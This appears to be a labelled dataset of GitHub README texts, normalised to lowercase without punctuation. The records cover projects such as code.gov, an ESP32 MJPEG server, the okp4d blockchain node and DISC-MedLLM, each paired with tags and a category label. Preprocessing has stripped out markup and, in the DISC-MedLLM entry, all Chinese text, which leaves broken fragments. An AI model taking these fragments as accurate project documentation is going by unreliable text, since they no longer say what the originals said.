partitioning criteria readme md range range a li li a href basics data partitioning criteria readme md list list a li li a href basics data partitioning criteria readme md hash hash a li li a href basics data partitioning criteria readme md round robin round robin a li li a href basics data partitioning criteria readme md name node name node a li ul li li a href basics denormalization vs normalization readme md data normalization and de normalization a li ol li li components ol li a href basics message queues readme md message queues a li li a href basics cache readme md cache a ol li a href basics cache readme md client side caching reverse proxy or cdn a li li a href basics cache readme md client side caching forward proxy a li ol li li a href basics load balancing readme md load balancing a li li a href basics dns readme md dns server a li ol li li other concepts ol li a href basics other concepts quorum readme md quorum sloppy quorum and hinted handoff a li li a href basics other concepts gossip protocol readme md gossip protocol a li li a href https www youtube com watch v zarkonvygr8 ab channel gauravsen consistent hashing a li li a href basics other concepts stateless web tier readme md stateless web tier a li ol li li other softwares ol li a href basics other softwares docker readme md docker a li li a href basics other softwares zookeeper readme md zookeeper a li li a href basics other softwares apache solr readme md solr a li li a href basics other softwares elasticsearch readme md elasticsearch a li li a href basics other softwares puppet readme md puppet a li li a href basics other softwares grpc readme md grpc a li ol li li designing data intensive applications notes ol li a href basics ddia chapter 1 readme md reliable scalable and maintainable applications a li li a href basics ddia chapter 2 readme md data models and query languages a li li a href basics ddia strike storage and retrieval strike a li li a href basics ddia strike encoding and evolution strike a li li a href basics ddia strike replication strike a li li a href basics ddia strike partitioning strike a li li a href basics ddia strike transactions strike a li li a href basics ddia strike the trouble with distributed systems strike a li li a href basics ddia strike consistency and consensus strike a li li a href basics ddia strike batch processing strike a li li a href basics ddia strike stream processing strike a li li a href basics ddia strike the future of data systems strike a li ol li ol h1 system design h1 p basics p ul li a href sysdesigns systemdesignsteps readme md basic system design steps a li ul p my designs p ul li a href sysdesigns newsfeed readme md news feed a ul li a href sysdesigns newsfeed project readme md project a li ul li li a href sysdesigns tiny url readme md tiny url a ul li a href sysdesigns tiny url project readme md project a li ul li li booking system li ul li a href sysdesigns booking system hotel reservation system readme md hotel reservation system a li li a href sysdesigns booking system avoiding double booking readme md avoiding double booking a li ul ul p notes on existing architectures p ul li a href sysdesigns pinterest readme md pinterest architecture 2012 a li li a href sysdesigns dynamo readme md dynamo distributed key value store a li li instagram ul li a href sysdesigns instagram 2011 architecture overview readme md architecture 2011 a li li a href sysdesigns instagram 2012 sharding readme md sharding 2012 a li ul li li a href sysdesigns centralized logging system readme md centralized logging system a ul li types of logging approaches ol li a href sysdesigns centralized 20logging 20system replication 20approch approch png logs are copied from the db a li li a href sysdesigns centralized 20logging 20system transport 20approch approch png logs are copied from the server a li ol li li a href sysdesigns centralized 20logging 20system netflix s 20logging 20system readme md netflix s logging system a li ul li ul h1 good reads h1 ul li a href https github com donnemartin system design primer system design primer by donne martin a li li a href https github com checkcheckzz system design interview system design interview resources by checkcheckzach a li li a href https gist github com vasanthk 485d1c25737e8e72759f system design cheat sheet by vasanth k a li li a href https www ibm com cloud learn ibm cloud learn a li li a href https igotanoffer com blogs tech network protocols proxies system design interview system design interview concepts on igotanoffer a li li a href http highscalability com high scalability a li li a href http patrickhalina com posts ml systems design interview guide ml systems design interview guide by patrik halina a li li a href https github com alex what happens when what happens when you type something in address bar a li li a href https www youtube com watch v w9f d3oy4 ab channel jorgescott cs75 summer 2012 lecture 9 scalability harvard web development david malan a ul li a href http ninefu github io blog harvard cs75 notes notes for harvard cs75 web development lecture 9 scalability by david malan a li ul li li a href http ninefu github io blog system design reading list system design reading list by nine notes a li li a href https www teamblind com post willing to help for system design xqq5u63y system design steps from blind article by gf from flipkart a li ul
system-design
os
esp32-cam-mjpeg-multiclient
esp32 mjpeg multiclient streaming server this is a simple mjpeg streaming webserver implemented for ai thinker esp32 cam or esp eye modules this is tested to work with vlc and blynk video widget this version uses freertos tasks to enable streaming to up to 10 connected clients inspired by and based on this instructable 9 rtsp video streamer using the esp32 cam board https www instructables com id 9 rtsp video streamer using the esp32 cam board full story https www hackster io anatoli arkhipenko multi client mjpeg streaming from esp32 47768f other repositories that may be of interest esp32 mjpeg streaming server servicing a single client https github com arkhipenko esp32 cam mjpeg esp32 mjpeg streaming server servicing multiple clients freertos based https github com arkhipenko esp32 cam mjpeg multiclient esp32 mjpeg streaming server servicing multiple clients freertos based with the latest camera drivers from espressif https github com arkhipenko esp32 mjpeg multiclient espcam drivers cooperative multitasking library https github com arkhipenko taskscheduler
video streaming esp32 esp32-cam esp-eye freertos rtos multiclient webserver gstreamer vlc
os
code-gov-front-end
code gov unlocking the potential of the federal government s software build status https circleci com gh gsa code gov front end svg style svg https circleci com gh gsa code gov front end code climate https api codeclimate com v1 badges 4675ef3ed03728b81e66 maintainability https codeclimate com github gsa code gov front end maintainability tested with jest https img shields io badge tested with jest 99424f svg https github com facebook jest introduction code gov https code gov is a website promoting good practices in code development collaboration and reuse across the u s government code gov provides tools and guidance to help agencies implement the federal source code policy https sourcecode cio gov it also includes an inventory of government custom code to promote reuse between agencies and provides tools to help government and the public collaborate on open source projects to learn more about the project check out this blog post https www whitehouse gov blog 2016 08 08 peoples code code gov is an open source project so we invite your contributions be it in the form of code design or ideas contributing here s how you can help contribute to code gov source code policy to provide feedback on the federal source code policy https sourcecode cio gov follow this issue tracker https github com whitehouse source code policy issues code gov to provide feedback on code gov front end please checkout our contributing guildelines contributing md to contribute to the code gov data go to the code gov data repo at https github com gsa code gov data checkout code gov https github com gsa code gov for a list of additional project repositories if you aren t sure where your question or idea fits this is a good place to share it getting started you will need node to run this website it s built against v10 19 0 the best way to get node is to install it via nvm see the nvm installation instructions https github com nvm sh nvm blob master readme md installation and update to set it up on your system after you have cloned this repo you can use npm install to install all of the project s dependencies you can then run the server using npm run start by default the development server will listen on http localhost 8080 you can change the default port by setting the port environment variable before starting the server for example port 3000 npm start specifying an api key the app uses the api key provided in the site json by default if you want to override that specify an code gov api key environmental variable here s an example code gov api key l87sfdi7ybc2bic7bai8cb2i176c3b872tb3 npm run start an alternate approach to using your api key every time you use npm run start is to create a env local file and store your api key remember to use code gov api key in accordance with dotenv flow https www npmjs com package dotenv flow your personal key will be ignored when committing updates to gh you can sign up for an api key https open gsa gov api codedotgov file structure the directories in src are organized around the pillars of react along with several additional custom file types when creating new files be sure to add your file and any necessary templates styles and tests to a directory dedicated to your new file in the appropriate place testing unit testing is done using the jest https github com facebook jest framework with enzyme https github com airbnb enzyme use npm run test to run unit tests a single time this will generate a code coverage report use npm run test watch to run unit tests continuously re running each time a file is saved by default only files changed since the last commit will be ran follow the command line prompt for customizing how tests are ran snapshot tests can be updated while running this command by pressing u to updated them note console log warn error are mocked in unit tests and will not print anything to avoid cluttering the command line use a different logging such as console info for debugging while running tests note site should be running locally before executing npm run test or you might get false errors due to the component plugins being used to run web accessibility testing do the following a make sure ruby https www ruby lang org en documentation installation and the bundler gem https bundler io are installed on your computer b start a server by running npm run start c use the npm run test pa11y command to run the accessibility tests pa11y ci uses urls in the sitemap file to run tests against it currently excludes anything in projects since this is over 6000 items it would take a long time to finish and just report the same issues over and over additional accessibility testing configuration is located in the pa11yci file a select few projects are listed here as url s to test these are tested in addition to the sitemap xml the sitemap find and sitemap replace commands allow us to scan the named pages in the sitemap but test them locally against the server you are running on your machine we follow the wcag2aa standard for more info on the rules being tested checkout the pa11y wiki https github com pa11y pa11y wiki html codesniffer rules end to end tests we use cypress to run end to end tests to run cypress testing do the following a make sure you run npm install to install all of the project s dependencies b start a server by running npm run start c use the npm run test cypress command to run the cypress tests once these steps are completed you should see the list of spec files cypress startup assets img cypress running png click the run all specs button in the upper right to run the tests cypress tests assets img cypress tests png deployment read about how to publish to github pages federalist and elsewhere here deployment md bundle analysis https federalist proxy app cloud gov preview gsa code gov front end federalist bundle analysis report html deploying arbitrary branch coming soon generating license data to update the dependency licenses json file run npm run licenses configuration for documentation on how to configure code gov front end read here configuration md questions if you have questions please feel free to contact us open an issue https github com gsa code gov front end issues linkedin https www linkedin com company code gov twitter https twitter com codedotgov email mailto code gsa gov or join our opensource public channel on slack https chat 18f gov license as stated in contributing contributing md this project is in the worldwide public domain in the public domain within the united states and copyright and related rights in the work worldwide are waived through the cc0 1 0 universal public domain dedication https creativecommons org publicdomain zero 1 0 all contributions to this project will be released under the cc0 dedication by submitting a pull request you are agreeing to comply with this waiver of copyright interest
civic-tech federal-government federal helpwanted open-source code-gov code-gov-front-end
front_end
mml-book.github.io
mml book github io companion webpage to the book mathematics for machine learning https mml book com https mml book com copyright 2020 by marc peter deisenroth a aldo faisal and cheng soon ong to be published by cambridge university press we are in the process of writing a book on mathematics for machine learning that motivates people to learn mathematical concepts the book is not intended to cover advanced machine learning techniques because there are already plenty of books doing this instead we aim to provide the necessary mathematical skills to read those other books we split the book into two parts mathematical foundations example machine learning algorithms that use the mathematical foundations we aim to keep this book reasonably short so we cannot cover everything we will also provide exercises for part 1 and jupyter notebooks for part 2 of the book the notebooks can be run live on binder https mybinder org badge logo svg https mybinder org v2 gh mml book mml book github io master filepath tutorials alternatively try them directly on google colab title tutorial notebook solution linear regression open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial linear regression ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial linear regression solution ipynb principal component analysis pca open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial pca ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial pca solution ipynb gaussian mixture model gmm open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial gmm ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial gmm solution ipynb
ai
okp4d
okp4 github banner https raw githubusercontent com okp4 github main profile static okp4 banner v2 webp https okp4 network p align center a href https discord gg okp4 img src https img shields io badge discord 7289da style for the badge logo discord logocolor white a nbsp a href https www linkedin com company okp4 open knowledge protocol for img src https img shields io badge linkedin 0077b5 style for the badge logo linkedin logocolor white a nbsp a href https twitter com okp4 protocol img src https img shields io badge twitter 1da1f2 style for the badge logo twitter logocolor white a nbsp a href https medium com okp4 img src https img shields io badge medium 12100e style for the badge logo medium logocolor white a nbsp a href https www youtube com channel uciofctauyv2szv4oqiepivg img src https img shields io badge youtube ff0000 style for the badge logo youtube logocolor white a p 4 lint https img shields io github actions workflow status okp4 okp4d lint yml label lint style for the badge logo github https github com okp4 okp4d actions workflows lint yml build https img shields io github actions workflow status okp4 okp4d build yml label build style for the badge logo github https github com okp4 okp4d actions workflows build yml test https img shields io github actions workflow status okp4 okp4d test yml label test style for the badge logo github https github com okp4 okp4d actions workflows test yml codecov https img shields io codecov c github okp4 okp4d style for the badge token o3fjo5qdca logo codecov https codecov io gh okp4 okp4d docker pull https img shields io docker pulls okp4 okp4d label downloads style for the badge logo docker https hub docker com r okp4 okp4d discord https img shields io discord 946759919678406696 svg label discord logo discord logocolor white style for the badge https discord gg okp4 conventional commits https img shields io badge conventional 20commits 1 0 0 yellow svg style for the badge logo conventionalcommits https conventionalcommits org semantic release https img shields io badge 20 20 f0 9f 93 a6 f0 9f 9a 80 semantic release e10079 svg style for the badge https github com semantic release semantic release contributor covenant https img shields io badge contributor 20covenant 2 1 4baaaa svg style for the badge https github com okp4 github blob main code of conduct md license https img shields io github license okp4 okp4d svg label license style for the badge https opensource org licenses apache 2 0 okp4 is a public dpos https en bitcoinwiki org wiki dpos layer 1 specifically designed to enable communities to trustlessly share data algorithms and resources to build the dataverse an open world where everybody can create or participate in custom ecosystems with common governance mechanisms sharing rules business models to build a new generation of dapps way beyond decentralized finance the protocol okp4d is the node of the okp4 https okp4 network network built on the cosmos sdk tendermint consensus and designed to become a hub of incentivized data providers developers data scientists users collaborating to generate value from data and algorithms read more in the introduction blog post https blog okp4 network what is okp4 b6bb058ae221 for a high level overview of the okp4 protocol and network economics check out the white paper https docs okp4 network docs whitepaper abstract want to become a validator validators are responsible for securing the okp4 network validator responsibilities include maintaining a functional node https docs okp4 network docs nodes run node with constant uptime and providing a sufficient amount of know as stake in exchange for this service validators receive block rewards and transaction fees want to become a validator checkout the documentation https docs okp4 network docs nodes introduction looking for a network to join checkout the networks https github com okp4 networks supported platforms the okp4d blockchain currently supports the following builds platform arch status darwin amd64 darwin arm64 linux amd64 linux arm64 windows amd64 br not supported note as the blockchain depends on cosmwasm wasmvm https github com cosmwasm wasmvm we only support the targets supported by this project releases all releases can be found here https github com okp4 okp4d releases okp4d follows the semantic versioning 2 0 0 https semver org to determine when and how the version changes and we also apply the philosophical principles of release early release often https en wikipedia org wiki release early release often docker image for a quick start a docker image is officially available on docker hub https hub docker com r okp4 okp4d bash docker pull okp4 okp4d latest get the documentation bash docker run okp4 okp4d latest help query a running network example bash api url https api devnet okp4 network 443 rpc wallet okp41pmkq300lrngpkeprygfrtag0xpgp9z92c7eskm docker run okp4 okp4d latest query bank balances wallet chain id okp4 devnet 1 node api url create a wallet bash docker run v pwd home home okp4 okp4d latest keys add my wallet keyring backend test home home start a node everything you need to start a node and more is explained here https docs okp4 network docs nodes run node bash moniker node in my name chain id localnet okp4 1 docker run v pwd home home okp4 okp4d latest init moniker chain id chain id home home this will create a home folder you can then update the config genesis json with one of this ones https github com okp4 okp4d tree main chains join a running network set persistent peers in config config toml file then start the node bash docker run v pwd home home okp4 okp4d latest start home home developing contributing okp4d is written in go and built using cosmos sdk a number of smart contracts are also deployed on the okp4 blockchain and hosted in the okp4 contracts https github com okp4 contracts project prerequisites install go 1 21 following instructions from the official go documentation https golang org doc install use gofumpt https github com mvdan gofumpt as formatter you can integrate it in your favorite ide following these instructions https github com mvdan gofumpt installation or invoke the makefile make format go verify that docker is properly installed and if not follow the instructions https docs docker com for your environment verify that make https fr wikipedia org wiki make is properly installed if you intend to use the provided makefile makefile the project comes with a convenient makefile that helps you to build install lint and test the project text make target targets lint lint lint all available linters lint go lint go source code lint proto lint proto files format format run all available formatters format go format go files format proto format proto files build build build all available artefacts executable docker image etc build go build node executable for the current environment default build build go all build node executables for all available environments install install install node executable test test pass all the tests test go pass the test for the go source code chain chain init initialize the blockchain with default settings chain start start the blockchain with existing configuration see chain init chain stop stop the blockchain chain upgrade test the chain upgrade from the given from version to the given to version clean clean remove all the files from the target folder proto proto generate all resources for proto files go doc etc proto format format protobuf files proto build build all protobuf files proto gen generate all the code from the protobuf files documentation doc generate all the documentation doc proto generate the documentation from the protobuf files doc command generate markdown documentation for the command mock mock generate all the mocks for tests release release assets generate release assets help help show this help this makefile depends on docker to install it please follow the instructions for macos https docs docker com docker for mac install for windows https docs docker com docker for windows install for linux https docs docker com engine install build to build the okp4d node invoke the goal build of the makefile sh make build the binary will be generated under the folder target dist bug reports feature requests if you notice anything not behaving how you expected if you would like to make a suggestion or would like to request a new feature please open a new issue https github com okp4 okp4d issues new choose we appreciate any help you re willing to give don t hesitate to ask if you are having trouble setting up your project repository creating your first branch or configuring your development environment mentors and maintainers are here to help community the okp4 discord server https discord gg okp4 is our primary chat channel for the open source community software developers and node operators please reach out to us and say hi we re happy to help there cosmos sdk https v1 cosmos network sdk docker https www docker com go https go dev tendermint https tendermint com
blockchain cosmos-sdk golang
blockchain
assignment-
assignment week one assignment done by zarr patel for the given criteria analyze an array of unsigned char data items and report analytics on the maximum minimum mean and median of the data set this assignment if for embedded system design on coursera
os
NLP-Specialization
nlp specialization nlp specialization made by deeplearning ai natural language processing specialization this 4 course specialization is launched on june 17 right now the repository contains files for course 1 2 and 3 the assignment files are already completed further files of course 4 will be uploaded when the courses go live edits update 1 course 3 materials added on 07 31 2020 more week materials will be added by aug 2 update 2 course 3 final materials added on 08 02 2020 high size files can be downloaded by coursera update 3 c3 wx assignment original ipynb files with no prefilled code are added in course 3 by demand from sun trancks update 4 for the launch of course 4 i have decided only to upload the assignment ipynb and the prefilled version of it the additional resources data model utils py can be acquired from coursera update 5 course 4 content added on 09 23 2020 with only the assignment ipynb and prefilled ipynb usage use the assignment files with prefilled code for reference only disclaimer the files uploaded were used during the alpha testing of the course chances are there might be changes in the new files if there is any major change you d like to address you can mail me on gmail mailto sachin27071998 gmail com or send a message on my linkedin profile https www linkedin com in sachinwani27 contributing pull requests are welcome for major changes please open an issue first to discuss what you would like to change
nlp-specialization deeplearning-ai solutions solution github machine-learning coursera nlp natural-language-processing specialization course assignments assignment assignment-solutions coursera-assignment
ai
houston
eduzz houston publish https github com eduzz houston actions workflows master yml badge svg branch master https github com eduzz houston actions workflows master yml version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui img src src public img welcome png width 100 instala o completa bash todos os packages de uso yarn add eduzz houston projetos package descri o link version eduzz houston ui componentes ui para web visualizar pages ui components version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston styles criador de estilos com suporte aos tokens visualizar pages styles version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston tokens variaveis globais do design system visualizar pages tokens version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston mobile componentes ui para mobile visualizar https github com eduzz houston mobile version https img shields io npm v eduzz houston mobile https www npmjs com package eduzz houston mobile eduzz eslint config houston configura o padr o para o eslint visualizar pages eslint config version https img shields io npm v eduzz eslint config houston https www npmjs com package eduzz eslint config houston eduzz houston forms hooks para valida o de formul rios visualizar pages forms version https img shields io npm v eduzz houston forms https www npmjs com package eduzz houston forms eduzz houston hooks hooks v riados visualizar pages forms version https img shields io npm v eduzz houston hooks https www npmjs com package eduzz houston hooks quer contribuir veja os detalhes aqui contributing md
ui-components design-system react eduzz javascript typescript hacktoberfest antd
os
Predicting_Personality_Type
predicting myers briggs personality types from social media posts capstone project i completed as a student in the data science immersive program at general assembly this project uses natural language processing techniques to analyze text postings on a social forum and predict the writers myers briggs personality type using a classification model it also compares personality types based on other factors such as the length polarity and subjectivity of these posts techniques models used natural language processing nlp stopwords porterstemmer textblob countvectorizer randomforestclassifier kneighborsclassifier onevsrestclassifier gridsearchcv tukey range test t test numpy pandas matplotlib seaborn background personality refers to individual differences in characteristic patterns of thinking feeling and behaving personality typologies classify different types of individuals to reveal and enhance the understanding of their behaviors the myers briggs type indicator mbti is a psychological assessment tool to classify people into one of 16 different personality types the classification system consists of a four letter code based on four axes where each letter in the code refers to the predominant trait in each axis the four axes are introversion i extroversion e describes the different attitudes people use to direct their energy i e the inner world vs one s outer world intuition n sensing s describes people s method of processing informaton i e paying more attention to the patterns and possibilities seen in the information received vs information that comes in through the five senses thinking t feeling f describes people s method for making decisions i e putting more weight on objective principles and impersonal facts vs personal concerns and the people involved judging j perceiving p describes people s orientation to the outside world and the behaviors one exhibits i e preferring a structured and decided lifestyle vs a more flexible and adaptive lifestyle for example a person scoring higher on introversion sensing thinking and judging would be classified with an istj personality type data source the dataset was obtained on kaggle https www kaggle com datasnaek mbti type and contains data from 8 675 subjects the original dataset consists of 2 columns type subjects known mbti code 16 codes in total posts subjects 50 most recent posts on personalitycafe an online forum focusing on personality types http personalitycafe com forum the site is geared toward the general public not psychology professionals with an interest in the topic of personality types the dataset is skewed toward subjects from the introverted intuitive personality types infj infp intj and intp also personality types are self reported by the users of this forum and it is assumed that they are reported accurately key findings multiclass classification three different classification models were tested k neighbors classifier random forest classifier and one vs the rest classifier the one vs the rest classifier although having only the second highest accuracy score of the three 0 265 cleared the 0 211 baseline and also predicted classes across the entire 16 class range unlike the top scoring random forest classifier binary classification a random forest classifier was used to classify each of the four axis pairs this model was chosen because it had the highest accuracy rate of the three models used in the multiclass exercise although it had faltered in the predictions of the lower prevalence classes the model topped the baseline on only the thinking feeling axis with an accuracy of 0 697 vs a baseline of 0 541 but the models for the other three axes did not fall that far behind their respective baselines sentiment analysis and word count on average subjects used 26 4 words per post with a neutral polarity 0 133 and moderate subjectivity 0 540 those with one of the intuitive feeling personality types tended to have higher post lengths than many of their counterparts while the extroversion intuitive feeling types tended to show significantly higher but still relatively neutral polarity and higher but still relatively moderate subjectivity than the other personality types
ai
pattern-kit
pattern kit pattern kit is an application that lets you preview your library of templates and manipulate their content by interacting with a form built from the schemas it is both a development tool and a public facing pattern library for a demo check out pattern kit demo https webrh patternkit int open paas redhat com installation note by following these instructions you do not need to clone this git repository create composer json at pattern library root and require pattern kit require pattern builder pattern kit dev repositories type vcs url https github com patternbuilder pattern kit add index php at pattern library root php require once dir vendor autoload php require dir vendor pattern builder pattern kit src app php app http cache run add pk config yml at pattern library root create arrays of paths to your data schema template docs and styleguide files relative to config set the file extensions for each file type list categories in order you d like them to appear in navigation add any attributes you want printed on the body tag using body attr create arrays of assets for css js and footer js including live reload if necessary title project title paths relative to your pattern library root data path to sample data schemas path to schemas templates path to templates docs path to schemas docs sg path to stylelguide docs extensions data docs json schemas json templates twig docs docs md sg sg md categories pattern sub pattern layout component atom body attr unresolved class foo bar assets css path to css path to othercss js path to js path to otherjs footer js path to footer js path to otherfooter js localhost 1336 livereload js in your terminal cd pattern library root composer install use pattern kit point mamp or local php server at your index php file php s 0 9001 t
os
Machine-Learning-Projects
machine learning projects dataset https img shields io badge dataset kaggle blue svg python 3 6 https img shields io badge python 3 6 brightgreen svg nltk https img shields io badge library sklearn orange svg ml readme resources machine learning png why this repository the main purpose of making this repository is to keep all my machine learning projects at one place hence keeping my github clean br it looks good isn t it overview this repository consists of all my machine learning projects br datasets are provided in each of the folders above and the solution to the problem statements as well algorithms used regression br linear regression br multiple linear regression br logistic regression br polynomial regression br lasso and ridge regression l1 l2 regularization br elastic net regression classification br k nearest neighbours br support vector machine br naive bayes br decision tree br clustering br k means br ensemble br random forest br adaptive boosting adaboost br extreme gradient boosting xgboost br voting hard soft br do the repository if it helped you in anyway
machine-learning regression classification clustering deployment python jupyter-notebook google-colab seaborn matplotlib numpy pandas sklearn
ai
Harris-Corner-Detector
harris corner detector implementation of the harris corner detection algorithm with maxima suppression for i o and displaying the transformed image opencv is used whereas the harris corner detector is completely self implemented prerequisite software opencv http opencv org cmake http www cmake org install build instructions open a shell and cd into a directory wished to git clone in clone the repo git clone https github com alexanderb14 harris corner detector git cd into it cd harris corner detector create a build directory and cd into it mkdir build cd build run cmake and initiate the build process cmake make usage ex2 jpg file sample image files can be found in sampledata
ai
Parstagram
parstagram part ii this is an instagram clone with a custom parse backend that allows a user to post photos view a global photos feed and add comments time spent 5h 30 hours spent in total user stories the following required functionality is completed x user stays logged in across restarts 1pt x user can log out 1pt x user can view comments on a post 3pts x user can add a new comment 5pts video walkthrough here s a walkthrough of implemented user stories img src http g recordit co 2t91niwmdh gif title video walkthrough width alt video walkthrough parstagram part i this is an instagram clone with a custom parse backend that allows a user to post photos and view a global photos feed time spent 5 hours spent in total user stories the following required functionality is completed x user sees app icon in home screen and styled launch screen 1pt x user can sign up to create a new account 1pt x user can log in 1pt x user can take a photo add a caption and post it to the server 3pt x user can view the last 20 posts 4pts video walkthrough here s a walkthrough of implemented user stories img src http g recordit co l2tojt55ai gif title video walkthrough width alt video walkthrough
server
vraptor4
image https cloud githubusercontent com assets 1529021 7015058 0844e14c dca4 11e4 8d7b e0546b6ec74d png travis img travis maven img maven release img release license img license travis https travis ci org caelum vraptor4 travis img https travis ci org caelum vraptor4 svg branch master maven http search maven org search gav 1 g br com caelum 20and 20a vraptor maven img https maven badges herokuapp com maven central br com caelum vraptor badge svg release https github com caelum vraptor4 releases release img https img shields io github release caelum vraptor4 svg license license license img https img shields io badge license apache 202 blue svg a web mvc action based framework on top of cdi for fast and maintainable java development downloading for a quick start you can use this snippet in your maven pom xml dependency groupid br com caelum groupid artifactid vraptor artifactid version 4 2 2 version or the latest version dependency more detailed prerequisites and dependencies can be found here http www vraptor org en docs dependencies and prerequisites documentation more detailed documentation http www vraptor org en docs one minute guide and javadoc http www vraptor org javadoc are available at vraptor s website http www vraptor org en you also might be interested in our articles and presentations page http www vraptor org en docs articles and presentations building in your machine you can build vraptor by running mvn package vraptor uses maven as build tool so you can easily import it into your favorite ide contribute to vraptor do you want to contribute with code documentation or reporting a bug you can find our guideline here http www vraptor org en docs how to contribute contribute
front_end
DISC-MedLLM
disc medllm div align center generic badge https img shields io badge huggingface 20repo green svg https huggingface co flmc disc medllm license https img shields io github license modelscope modelscope svg https github com fudandisc dics medllm blob main license br div div align center demo http med fudan disc com https arxiv org abs 2308 14346 br en https github com fudandisc disc medllm blob main readme en md div disc medllm fudan disc http fudan disc com disc med sft https huggingface co datasets flmc disc med sft disc medllm https huggingface co flmc disc medllm http med fudan disc com disc medllm disc medllm llm in the loop human in the loop disc medllm img src https github com fudandisc disc medllm blob main images data construction png alt data construction width 85 img src https github com fudandisc disc medllm blob main images consultation gif alt sample1 width 60 img src https github com fudandisc disc medllm blob main images advice gif alt sample2 width 60 disc medllm disc med sft 47 sft style type text css tg border collapse collapse border spacing 0 tg td border color black border style solid border width 1px font family arial sans serif font size 14px overflow hidden padding 10px 5px word break normal tg th border color black border style solid border width 1px font family arial sans serif font size 14px font weight normal overflow hidden padding 10px 5px word break normal tg tg 9wq8 border color inherit text align center vertical align middle tg tg c3ow border color inherit text align center vertical align top style table class tg style undefined table layout fixed width 442px colgroup col style width 204 428571px col style width 135 428571px col style width 102 428571px colgroup thead tr th class tg 9wq8 rowspan 2 br th th class tg 9wq8 rowspan 2 br th th class tg 9wq8 rowspan 2 br th tr tr tr thead tbody tr td class tg 9wq8 rowspan 2 ai td td class tg 9wq8 meddialog td td class tg 9wq8 400k td tr tr td class tg 9wq8 cmedqa2 td td class tg c3ow 20k td tr tr td class tg c3ow td td class tg 9wq8 cmekg td td class tg 9wq8 50k td tr tr td class tg c3ow td td class tg 9wq8 td td class tg 9wq8 2k td tr tr td class tg 9wq8 rowspan 3 td td class tg c3ow medmcqa td td class tg c3ow 8k td tr tr td class tg c3ow moss sft td td class tg c3ow 33k td tr tr td class tg c3ow alpaca gpt4 zh td td class tg c3ow 1k td tr tbody table br 47 ai https huggingface co datasets flmc disc med sft br disc medllm baichuan 13b base https github com baichuan inc baichuan 13b hugging face https huggingface co flmc disc medllm shell pip install r requirements txt hugging face transformers python import torch from transformers import automodelforcausallm autotokenizer from transformers generation utils import generationconfig tokenizer autotokenizer from pretrained flmc disc medllm use fast false trust remote code true model automodelforcausallm from pretrained flmc disc medllm device map auto torch dtype torch float16 trust remote code true model generation config generationconfig from pretrained flmc disc medllm messages messages append role user content response model chat tokenizer messages print response demo shell python cli demo py demo shell streamlit run web demo py server port 8888 disc medllm baichuan 13b baichuan 13b https github com baichuan inc baichuan 13b int8 int4 br firefly https github com yangjianxin1 firefly shell deepspeed num gpus num gpus train train py train args file train train args sft json sft json br shell b user token content assistant token content s user token content user token assistant token 195 and 196 baichuan 13b chat we compare our model with three general purpose llms and two conversational chinese medical domain llms specifically these are gpt 3 5 and gpt 4 from openai the aligned conversational version of our backbone model baichuan 13b base baichuan 13b chat and the open source chinese conversational medical model huatuogpt 13b trained from ziya llama 13b and bianque 2 our evaluation approach encompasses two key dimensions an assessment of conversational aptitude using gpt 4 as a reference judge and a comprehensive benchmark evaluation qa gpt 3 5 gpt 4 eval gpt 4 br qa mlec qa https github com judenpech mlec qa 306 the mlec qa contains questions from the china nmlec categorized into clinic stomatology public health traditional chinese medicine and integrated traditional chinese and western medicine we selected 1 362 questions 10 of the test set for evaluation from western medicine 306 we used a combined 270 questions from 2020 and 2021 our study involved both zero shot and few shot approaches with examples from mlec qa s validation set and 2019 western medicine 306 questions for the few shot samples few shot mlec qa mlec qa mlec qa mlec qa mlec qa 306 gpt 3 5 58 63 45 9 53 51 51 52 43 47 44 81 49 64 baichuan 13b chat 31 25 37 69 28 65 27 27 29 77 24 81 29 91 huatuo 13b 31 85 25 32 43 32 95 26 54 24 44 28 87 disc medllm 44 64 41 42 41 62 38 26 39 48 33 33 39 79 zero shot mlec qa mlec qa mlec qa mlec qa mlec qa 306 gpt 3 5 47 32 33 96 48 11 39 77 38 83 33 33 40 22 baichuan 13b chat 44 05 43 28 39 92 31 06 41 42 32 22 38 66 huatuo 13b 27 38 21 64 25 95 25 76 24 92 20 37 24 34 disc medllm 44 64 37 31 35 68 34 85 41 75 31 11 37 56 gpt 3 5 clearly outperformed others in the multiple choice assessment while our model achieved a strong second place in few shot scenarios in zero shot scenarios it followed closely behind baichuan 13b chat securing the third spot these results highlight the current priority gap in performance for conversational medical models on knowledge intensive tests like multiple choice questions chinese medical benchmark cmb clin https github com freedomintelligence cmb chinese medical dialogue dataset cmd https github com ucsd ai4h medical dialogue system chinese medical intent dataset cmid https github com imu machinelearningsxd cmid cmb clin cmd cmid br within this framework the evaluation of the dialogues is based on four criteria proactivity accuracy helpfulness and linguistic quality 1 proactivity the doctor can proactively and clearly request the patient to provide more information about the symptoms physical examination results and medical history when the information is insufficient actively guiding the patient through the consultation process 2 accuracy the diagnosis or advice the doctor provides is accurate and has no factual errors conclusions are not made arbitrarily 3 helpfulness the doctor s responses provide the patient with clear instructive and practical assistance specifically addressing the patient s concerns 4 linguistic quality the conversation is logical the doctor correctly understands the patient s semantics and the expression is smooth and natural cmb clin gpt3 5 4 30 4 53 4 55 5 00 4 60 gpt4 4 15 4 70 4 75 4 96 4 64 baichuan 13b caht 4 30 4 58 4 73 4 95 4 64 bianque 2 3 97 4 36 4 37 4 81 4 38 huatuo 13b 4 40 4 62 4 74 4 96 4 68 disc medllm 4 64 4 47 4 66 4 99 4 69 cmd img src https github com fudandisc disc medllm blob main images cmd png alt cmd width 75 cmid img src https github com fudandisc disc medllm blob main images cmid png alt cmid width 75 meddialog https github com ucsd ai4h medical dialogue system cmekg https github com king yyf cmekg tools cmedqa https github com zhangsheng93 cmedqa2 baichuan 13b https github com baichuan inc baichuan 13b firefly https github com yangjianxin1 firefly disc medllm angular2 misc bao2023discmedllm title disc medllm bridging general large language models and real world medical consultation author zhijie bao and wei chen and shengze xiao and kuang ren and jiaao wu and cheng zhong and jiajie peng and 